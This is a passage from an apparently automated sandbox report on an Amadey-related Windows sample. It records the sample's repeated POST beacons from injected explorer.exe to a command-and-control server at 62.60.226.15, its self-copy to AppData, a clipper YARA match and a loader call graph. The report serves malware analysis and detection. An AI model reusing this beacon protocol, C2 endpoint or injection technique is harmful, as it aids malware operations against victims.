                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 7 <c><d>0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                58192.168.2.104978262.60.226.15802972C:\Windows\SysWOW64\explorer.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 16, 2024 15:29:40.035778999 CET155OUTPOST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 4
                                                Cache-Control: no-cache
                                                Data Raw: 73 74 3d 73
                                                Data Ascii: st=s
                                                Dec 16, 2024 15:29:41.307801008 CET219INHTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:29:41 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Refresh: 0; url = Login.php
                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 1 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                59192.168.2.104978362.60.226.15802972C:\Windows\SysWOW64\explorer.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 16, 2024 15:29:42.941560984 CET305OUTPOST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 152
                                                Cache-Control: no-cache
                                                Data Raw: 72 3d 33 44 36 30 32 35 38 37 41 42 31 31 38 32 44 43 42 46 34 38 32 41 30 32 33 33 33 31 36 32 45 37 33 45 44 35 42 30 30 34 38 46 46 41 39 45 42 42 41 36 33 33 34 32 43 30 31 34 39 31 34 30 30 35 38 36 35 33 32 34 41 38 37 32 44 39 32 35 37 39 33 42 35 37 36 44 36 31 35 39 39 36 31 35 38 32 37 43 34 30 33 31 33 41 43 36 31 31 37 36 38 34 37 44 37 41 39 43 35 41 32 45 45 36 39 46 30 35 37 34 36 41 32 32 36 36 34 45 30 39 36 36 38 38 38 35 30 34 39 31
                                                Data Ascii: r=3D602587AB1182DCBF482A02333162E73ED5B0048FFA9EBBA63342C014914005865324A872D925793B576D61599615827C40313AC61176847D7A9C5A2EE69F05746A22664E096688850491
                                                Dec 16, 2024 15:29:44.244076967 CET196INHTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:29:44 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 7 <c><d>0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                60192.168.2.104978462.60.226.15802972C:\Windows\SysWOW64\explorer.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 16, 2024 15:29:45.984971046 CET155OUTPOST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 4
                                                Cache-Control: no-cache
                                                Data Raw: 73 74 3d 73
                                                Data Ascii: st=s
                                                Dec 16, 2024 15:29:47.343539000 CET219INHTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:29:47 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Refresh: 0; url = Login.php
                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 1 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                61192.168.2.104978562.60.226.15802972C:\Windows\SysWOW64\explorer.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 16, 2024 15:29:48.970845938 CET305OUTPOST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 152
                                                Cache-Control: no-cache
                                                Data Raw: 72 3d 33 44 36 30 32 35 38 37 41 42 31 31 38 32 44 43 42 46 34 38 32 41 30 32 33 33 33 31 36 32 45 37 33 45 44 35 42 30 30 34 38 46 46 41 39 45 42 42 41 36 33 33 34 32 43 30 31 34 39 31 34 30 30 35 38 36 35 33 32 34 41 38 37 32 44 39 32 35 37 39 33 42 35 37 36 44 36 31 35 39 39 36 31 35 38 32 37 43 34 30 33 31 33 41 43 36 31 31 37 36 38 34 37 44 37 41 39 43 35 41 32 45 45 36 39 46 30 35 37 34 36 41 32 32 36 36 34 45 30 39 36 36 38 38 38 35 30 34 39 31
                                                Data Ascii: r=3D602587AB1182DCBF482A02333162E73ED5B0048FFA9EBBA63342C014914005865324A872D925793B576D61599615827C40313AC61176847D7A9C5A2EE69F05746A22664E096688850491
                                                Dec 16, 2024 15:29:50.241635084 CET196INHTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:29:50 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 7 <c><d>0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                62192.168.2.104978662.60.226.15802972C:\Windows\SysWOW64\explorer.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 16, 2024 15:29:51.995702028 CET155OUTPOST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 4
                                                Cache-Control: no-cache
                                                Data Raw: 73 74 3d 73
                                                Data Ascii: st=s
                                                Dec 16, 2024 15:29:53.259152889 CET219INHTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:29:53 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Refresh: 0; url = Login.php
                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 1 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                63192.168.2.104978762.60.226.15802972C:\Windows\SysWOW64\explorer.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 16, 2024 15:29:54.891597033 CET305OUTPOST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 152
                                                Cache-Control: no-cache
                                                Data Raw: 72 3d 33 44 36 30 32 35 38 37 41 42 31 31 38 32 44 43 42 46 34 38 32 41 30 32 33 33 33 31 36 32 45 37 33 45 44 35 42 30 30 34 38 46 46 41 39 45 42 42 41 36 33 33 34 32 43 30 31 34 39 31 34 30 30 35 38 36 35 33 32 34 41 38 37 32 44 39 32 35 37 39 33 42 35 37 36 44 36 31 35 39 39 36 31 35 38 32 37 43 34 30 33 31 33 41 43 36 31 31 37 36 38 34 37 44 37 41 39 43 35 41 32 45 45 36 39 46 30 35 37 34 36 41 32 32 36 36 34 45 30 39 36 36 38 38 38 35 30 34 39 31
                                                Data Ascii: r=3D602587AB1182DCBF482A02333162E73ED5B0048FFA9EBBA63342C014914005865324A872D925793B576D61599615827C40313AC61176847D7A9C5A2EE69F05746A22664E096688850491
                                                Dec 16, 2024 15:29:56.163078070 CET196INHTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:29:55 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 7 <c><d>0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                64192.168.2.104978862.60.226.15802972C:\Windows\SysWOW64\explorer.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 16, 2024 15:29:57.907567024 CET155OUTPOST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 4
                                                Cache-Control: no-cache
                                                Data Raw: 73 74 3d 73
                                                Data Ascii: st=s
                                                Dec 16, 2024 15:29:59.175875902 CET219INHTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:29:58 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Refresh: 0; url = Login.php
                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 1 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                65192.168.2.104978962.60.226.15802972C:\Windows\SysWOW64\explorer.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 16, 2024 15:30:00.813570023 CET305OUTPOST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 152
                                                Cache-Control: no-cache
                                                Data Raw: 72 3d 33 44 36 30 32 35 38 37 41 42 31 31 38 32 44 43 42 46 34 38 32 41 30 32 33 33 33 31 36 32 45 37 33 45 44 35 42 30 30 34 38 46 46 41 39 45 42 42 41 36 33 33 34 32 43 30 31 34 39 31 34 30 30 35 38 36 35 33 32 34 41 38 37 32 44 39 32 35 37 39 33 42 35 37 36 44 36 31 35 39 39 36 31 35 38 32 37 43 34 30 33 31 33 41 43 36 31 31 37 36 38 34 37 44 37 41 39 43 35 41 32 45 45 36 39 46 30 35 37 34 36 41 32 32 36 36 34 45 30 39 36 36 38 38 38 35 30 34 39 31
                                                Data Ascii: r=3D602587AB1182DCBF482A02333162E73ED5B0048FFA9EBBA63342C014914005865324A872D925793B576D61599615827C40313AC61176847D7A9C5A2EE69F05746A22664E096688850491
                                                Dec 16, 2024 15:30:02.089543104 CET196INHTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:30:01 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 7 <c><d>0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                66192.168.2.104979062.60.226.15802972C:\Windows\SysWOW64\explorer.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 16, 2024 15:30:03.844510078 CET155OUTPOST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 4
                                                Cache-Control: no-cache
                                                Data Raw: 73 74 3d 73
                                                Data Ascii: st=s
                                                Dec 16, 2024 15:30:05.282505989 CET219INHTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:30:04 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Refresh: 0; url = Login.php
                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 1 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                67192.168.2.104979162.60.226.15802972C:\Windows\SysWOW64\explorer.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 16, 2024 15:30:06.907111883 CET305OUTPOST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 152
                                                Cache-Control: no-cache
                                                Data Raw: 72 3d 33 44 36 30 32 35 38 37 41 42 31 31 38 32 44 43 42 46 34 38 32 41 30 32 33 33 33 31 36 32 45 37 33 45 44 35 42 30 30 34 38 46 46 41 39 45 42 42 41 36 33 33 34 32 43 30 31 34 39 31 34 30 30 35 38 36 35 33 32 34 41 38 37 32 44 39 32 35 37 39 33 42 35 37 36 44 36 31 35 39 39 36 31 35 38 32 37 43 34 30 33 31 33 41 43 36 31 31 37 36 38 34 37 44 37 41 39 43 35 41 32 45 45 36 39 46 30 35 37 34 36 41 32 32 36 36 34 45 30 39 36 36 38 38 38 35 30 34 39 31
                                                Data Ascii: r=3D602587AB1182DCBF482A02333162E73ED5B0048FFA9EBBA63342C014914005865324A872D925793B576D61599615827C40313AC61176847D7A9C5A2EE69F05746A22664E096688850491
                                                Dec 16, 2024 15:30:08.180849075 CET196INHTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:30:07 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 7 <c><d>0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                68192.168.2.104979262.60.226.15802972C:\Windows\SysWOW64\explorer.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 16, 2024 15:30:09.927575111 CET155OUTPOST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 4
                                                Cache-Control: no-cache
                                                Data Raw: 73 74 3d 73
                                                Data Ascii: st=s
                                                Dec 16, 2024 15:30:11.266268969 CET219INHTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:30:11 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Refresh: 0; url = Login.php
                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 1 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                69192.168.2.104979362.60.226.15802972C:\Windows\SysWOW64\explorer.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 16, 2024 15:30:12.893666029 CET305OUTPOST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 152
                                                Cache-Control: no-cache
                                                Data Raw: 72 3d 33 44 36 30 32 35 38 37 41 42 31 31 38 32 44 43 42 46 34 38 32 41 30 32 33 33 33 31 36 32 45 37 33 45 44 35 42 30 30 34 38 46 46 41 39 45 42 42 41 36 33 33 34 32 43 30 31 34 39 31 34 30 30 35 38 36 35 33 32 34 41 38 37 32 44 39 32 35 37 39 33 42 35 37 36 44 36 31 35 39 39 36 31 35 38 32 37 43 34 30 33 31 33 41 43 36 31 31 37 36 38 34 37 44 37 41 39 43 35 41 32 45 45 36 39 46 30 35 37 34 36 41 32 32 36 36 34 45 30 39 36 36 38 38 38 35 30 34 39 31
                                                Data Ascii: r=3D602587AB1182DCBF482A02333162E73ED5B0048FFA9EBBA63342C014914005865324A872D925793B576D61599615827C40313AC61176847D7A9C5A2EE69F05746A22664E096688850491
                                                Dec 16, 2024 15:30:14.165957928 CET196INHTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:30:13 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 7 <c><d>0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                70192.168.2.104979462.60.226.15802972C:\Windows\SysWOW64\explorer.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 16, 2024 15:30:15.909370899 CET155OUTPOST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 4
                                                Cache-Control: no-cache
                                                Data Raw: 73 74 3d 73
                                                Data Ascii: st=s
                                                Dec 16, 2024 15:30:17.181735039 CET219INHTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:30:16 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Refresh: 0; url = Login.php
                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 1 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                71192.168.2.104979562.60.226.15802972C:\Windows\SysWOW64\explorer.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 16, 2024 15:30:18.813699007 CET305OUTPOST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 152
                                                Cache-Control: no-cache
                                                Data Raw: 72 3d 33 44 36 30 32 35 38 37 41 42 31 31 38 32 44 43 42 46 34 38 32 41 30 32 33 33 33 31 36 32 45 37 33 45 44 35 42 30 30 34 38 46 46 41 39 45 42 42 41 36 33 33 34 32 43 30 31 34 39 31 34 30 30 35 38 36 35 33 32 34 41 38 37 32 44 39 32 35 37 39 33 42 35 37 36 44 36 31 35 39 39 36 31 35 38 32 37 43 34 30 33 31 33 41 43 36 31 31 37 36 38 34 37 44 37 41 39 43 35 41 32 45 45 36 39 46 30 35 37 34 36 41 32 32 36 36 34 45 30 39 36 36 38 38 38 35 30 34 39 31
                                                Data Ascii: r=3D602587AB1182DCBF482A02333162E73ED5B0048FFA9EBBA63342C014914005865324A872D925793B576D61599615827C40313AC61176847D7A9C5A2EE69F05746A22664E096688850491
                                                Dec 16, 2024 15:30:20.087594032 CET196INHTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:30:19 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 7 <c><d>0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                72192.168.2.104979662.60.226.15802972C:\Windows\SysWOW64\explorer.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 16, 2024 15:30:21.828835011 CET155OUTPOST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 4
                                                Cache-Control: no-cache
                                                Data Raw: 73 74 3d 73
                                                Data Ascii: st=s
                                                Dec 16, 2024 15:30:23.097453117 CET219INHTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:30:22 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Refresh: 0; url = Login.php
                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 1 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                73192.168.2.104979762.60.226.15802972C:\Windows\SysWOW64\explorer.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 16, 2024 15:30:24.736413956 CET305OUTPOST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 152
                                                Cache-Control: no-cache
                                                Data Raw: 72 3d 33 44 36 30 32 35 38 37 41 42 31 31 38 32 44 43 42 46 34 38 32 41 30 32 33 33 33 31 36 32 45 37 33 45 44 35 42 30 30 34 38 46 46 41 39 45 42 42 41 36 33 33 34 32 43 30 31 34 39 31 34 30 30 35 38 36 35 33 32 34 41 38 37 32 44 39 32 35 37 39 33 42 35 37 36 44 36 31 35 39 39 36 31 35 38 32 37 43 34 30 33 31 33 41 43 36 31 31 37 36 38 34 37 44 37 41 39 43 35 41 32 45 45 36 39 46 30 35 37 34 36 41 32 32 36 36 34 45 30 39 36 36 38 38 38 35 30 34 39 31
                                                Data Ascii: r=3D602587AB1182DCBF482A02333162E73ED5B0048FFA9EBBA63342C014914005865324A872D925793B576D61599615827C40313AC61176847D7A9C5A2EE69F05746A22664E096688850491
                                                Dec 16, 2024 15:30:26.007086992 CET196INHTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:30:25 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 7 <c><d>0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                74192.168.2.104979862.60.226.15802972C:\Windows\SysWOW64\explorer.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 16, 2024 15:30:27.759300947 CET155OUTPOST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 4
                                                Cache-Control: no-cache
                                                Data Raw: 73 74 3d 73
                                                Data Ascii: st=s
                                                Dec 16, 2024 15:30:29.046945095 CET219INHTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:30:28 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Refresh: 0; url = Login.php
                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 1 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                75192.168.2.104979962.60.226.15802972C:\Windows\SysWOW64\explorer.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 16, 2024 15:30:30.681500912 CET305OUTPOST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 152
                                                Cache-Control: no-cache
                                                Data Raw: 72 3d 33 44 36 30 32 35 38 37 41 42 31 31 38 32 44 43 42 46 34 38 32 41 30 32 33 33 33 31 36 32 45 37 33 45 44 35 42 30 30 34 38 46 46 41 39 45 42 42 41 36 33 33 34 32 43 30 31 34 39 31 34 30 30 35 38 36 35 33 32 34 41 38 37 32 44 39 32 35 37 39 33 42 35 37 36 44 36 31 35 39 39 36 31 35 38 32 37 43 34 30 33 31 33 41 43 36 31 31 37 36 38 34 37 44 37 41 39 43 35 41 32 45 45 36 39 46 30 35 37 34 36 41 32 32 36 36 34 45 30 39 36 36 38 38 38 35 30 34 39 31
                                                Data Ascii: r=3D602587AB1182DCBF482A02333162E73ED5B0048FFA9EBBA63342C014914005865324A872D925793B576D61599615827C40313AC61176847D7A9C5A2EE69F05746A22664E096688850491
                                                Dec 16, 2024 15:30:31.953548908 CET196INHTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:30:31 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 7 <c><d>0


                                                Statistics

                                                CPU Usage

                                                Click to jump to process

                                                Memory Usage

                                                Click to jump to process

                                                High Level Behavior Distribution

                                                Click to dive into process behavior distribution

                                                Behavior

                                                Click to jump to process

                                                System Behavior

                                                General

                                                Target ID:0
                                                Start time:09:26:26
                                                Start date:16/12/2024
                                                Path:C:\Users\user\Desktop\pTvHtQDXio.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\pTvHtQDXio.exe"
                                                Imagebase:0x400000
                                                File size:14'014'536 bytes
                                                MD5 hash:7C23CCA92DDABC20911E0C51E19B002B
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:Borland Delphi
                                                Reputation:low
                                                Has exited:true

                                                General

                                                Target ID:2
                                                Start time:09:26:27
                                                Start date:16/12/2024
                                                Path:C:\Windows\SysWOW64\more.com
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\more.com
                                                Imagebase:0x750000
                                                File size:24'576 bytes
                                                MD5 hash:03805AE7E8CBC07840108F5C80CF4973
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_Amadey_3, Description: Yara detected Amadey\'s Clipper DLL, Source: 00000002.00000002.1577858534.0000000005CD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:moderate
                                                Has exited:true

                                                General

                                                Target ID:3
                                                Start time:09:26:27
                                                Start date:16/12/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff620390000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:6
                                                Start time:09:26:36
                                                Start date:16/12/2024
                                                Path:C:\Users\user\AppData\Roaming\ancar\comet.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Users\user\AppData\Roaming\ancar\comet.exe
                                                Imagebase:0x400000
                                                File size:14'014'536 bytes
                                                MD5 hash:7C23CCA92DDABC20911E0C51E19B002B
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:Borland Delphi
                                                Reputation:low
                                                Has exited:true

                                                General

                                                Target ID:9
                                                Start time:09:26:37
                                                Start date:16/12/2024
                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7580 -s 640
                                                Imagebase:0xe20000
                                                File size:483'680 bytes
                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:10
                                                Start time:09:26:38
                                                Start date:16/12/2024
                                                Path:C:\Windows\SysWOW64\explorer.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\explorer.exe
                                                Imagebase:0xb30000
                                                File size:4'514'184 bytes
                                                MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate
                                                Has exited:false

                                                Disassembly

                                                Reset < >

                                                  Execution Graph

                                                  Execution Coverage:40%
                                                  Dynamic/Decrypted Code Coverage:0%
                                                  Signature Coverage:5.6%
                                                  Total number of Nodes:143
                                                  Total number of Limit Nodes:7
                                                  execution_graph 1067 76ba55 1070 76adf5 1067->1070 1071 76ae5e 1070->1071 1127 769da5 1071->1127 1073 76ae93 1074 769da5 GetPEB 1073->1074 1075 76aeaa 1074->1075 1130 76a675 1075->1130 1077 76b122 1133 7698c5 1077->1133 1079 76b13f 1136 769be5 1079->1136 1081 76b15c 1082 76a675 GlobalAlloc 1081->1082 1083 76b264 1082->1083 1140 769855 1083->1140 1085 76b281 1086 769be5 2 API calls 1085->1086 1087 76b294 1086->1087 1143 76a6d5 1087->1143 1089 76b30c 1150 769945 1089->1150 1091 76b3e8 1153 769fb5 CreateFileW 1091->1153 1093 76b40a 1159 76a8d5 1093->1159 1095 76b44a 1096 76b504 1095->1096 1097 76b558 1095->1097 1163 76aa85 1096->1163 1099 76b590 1097->1099 1100 76b560 1097->1100 1101 76a675 GlobalAlloc 1099->1101 1169 769a55 1100->1169 1105 76b59d 1101->1105 1102 76b550 1106 76b820 1102->1106 1109 76b86f 1102->1109 1192 769245 1102->1192 1107 76a675 GlobalAlloc 1105->1107 1108 76b61b 1107->1108 1173 769995 1108->1173 1109->1106 1110 76a675 GlobalAlloc 1109->1110 1112 76b91c 1110->1112 1114 769be5 2 API calls 1112->1114 1113 76b66d 1116 76a675 GlobalAlloc 1113->1116 1119 76b785 1113->1119 1115 76b953 1114->1115 1118 76a675 GlobalAlloc 1115->1118 1125 76b6c8 1116->1125 1120 76b990 1118->1120 1119->1102 1188 769045 1119->1188 1121 76b9ad VirtualProtect 1120->1121 1167 769f65 1121->1167 1125->1119 1178 769395 1125->1178 1181 76abb5 1125->1181 1195 76ada5 GetPEB 1127->1195 1129 769dc5 1129->1073 1131 76a685 1130->1131 1132 76a691 GlobalAlloc 1130->1132 1131->1132 1132->1077 1134 76a675 GlobalAlloc 1133->1134 1135 7698d4 1134->1135 1135->1079 1137 76a675 GlobalAlloc 1136->1137 1138 769bf6 1137->1138 1139 769c09 LoadLibraryW 1138->1139 1139->1081 1141 76a675 GlobalAlloc 1140->1141 1142 769864 1141->1142 1142->1085 1145 76a6ea 1143->1145 1144 76a675 GlobalAlloc 1144->1145 1145->1144 1146 76a722 NtQuerySystemInformation 1145->1146 1149 76a710 1145->1149 1146->1145 1147 76a74e 1146->1147 1148 76a675 GlobalAlloc 1147->1148 1148->1149 1149->1089 1151 76a675 GlobalAlloc 1150->1151 1152 769953 1151->1152 1152->1091 1154 769fe9 1153->1154 1158 769fe2 1153->1158 1155 76a675 GlobalAlloc 